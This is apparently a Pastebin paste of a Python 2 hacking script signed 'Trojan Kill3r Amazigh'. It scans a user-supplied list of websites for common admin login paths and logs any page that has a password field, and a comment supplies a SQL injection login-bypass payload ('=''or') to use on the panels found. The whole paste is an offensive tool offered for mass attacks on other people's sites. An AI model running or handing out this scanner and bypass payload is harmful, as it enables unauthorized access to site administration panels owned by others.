Advertisement
Guest User

Untitled

a guest
Mar 13th, 2017
150
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.48 KB | None | 0 0
  1. import httplib, sys, os, time
  2. from platform import system
  3.  
  4. #Help Work Just With python 2
  5. #Install Pyhon 2. .... Version
  6. #if u edited Script U Are Nooob
  7. #We Are Algerien Amazigh
  8. #========================================
  9. #Tools : Noredirect in ferfox
  10. #or user : '=''or' --- pass: '=''or'
  11. #========================================
  12.  
  13. def clearscr():
  14. if system() == 'Linux':
  15. os.system("clear")
  16. if system() == 'Windows':
  17. os.system('cls')
  18. os.system('color a')
  19. else:
  20. pass
  21. clearscr()
  22.  
  23.  
  24. def slowprint(s):
  25. for c in s + '\n':
  26. sys.stdout.write(c)
  27. sys.stdout.flush()
  28. time.sleep(4. / 100)
  29. print("""
  30. _ _ _ _ _ _ _____
  31. __ _ _ __ ___ __ _ ___(_) __ _| |__ | | _(_) | |___ / _ __
  32. / _` | '_ ` _ \ / _` |_ / |/ _` | '_ \ | |/ / | | | |_ \| '__|
  33. | (_| | | | | | | (_| |/ /| | (_| | | | | | <| | | |___) | |
  34. \__,_|_| |_| |_|\__,_/___|_|\__, |_| |_| |_|\_\_|_|_|____/|_|
  35. |___/
  36. """)
  37. slowprint("\n\t\t\t\t\tCoded By " + "./Trojan Kill3r Amazigh" + "\n\t\t\t\t\t\t Facebook: fb.com/pow.lsky1")
  38. ################ Bypass ####################
  39.  
  40. bypass = ["/admin/login.php", "/admin/admin.php", "/admin/", "/admin.php", "/admin/login.html"]
  41. dz = raw_input("Entre List Of Site: ")
  42. dz = open(dz, "r")
  43. try:
  44. for i in dz:
  45. i = i.rstrip()
  46. for by in bypass:
  47. by = by.rstrip()
  48. try:
  49. if i[:7] == ("http://"):
  50. i = i.replace("http://", "")
  51. if i[:8] == ("https://"):
  52. i = i.replace("https://", "")
  53. if i[-1] == ("/"):
  54. i = i.replace("/", "")
  55. except:
  56. pass
  57. print ("\t" + i + " Scaning ..... ")
  58. try:
  59. conn = httplib.HTTPConnection(i)
  60. conn.request("GET", by)
  61. conn = conn.getresponse()
  62. htmlbypass = conn.read()
  63. if conn.status == 200 and ('type="password"') in htmlbypass:
  64. print("Admin Panel Found ======>"), i + by
  65. with open("Panel Admin Bypass.txt", "a") as amazigh:
  66. amazigh.writelines(i + by + "\n")
  67. else:
  68. print ("[ByPass]" + " ..........[NOT VULN]\n")
  69. except:
  70. pass
  71. except:
  72. pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement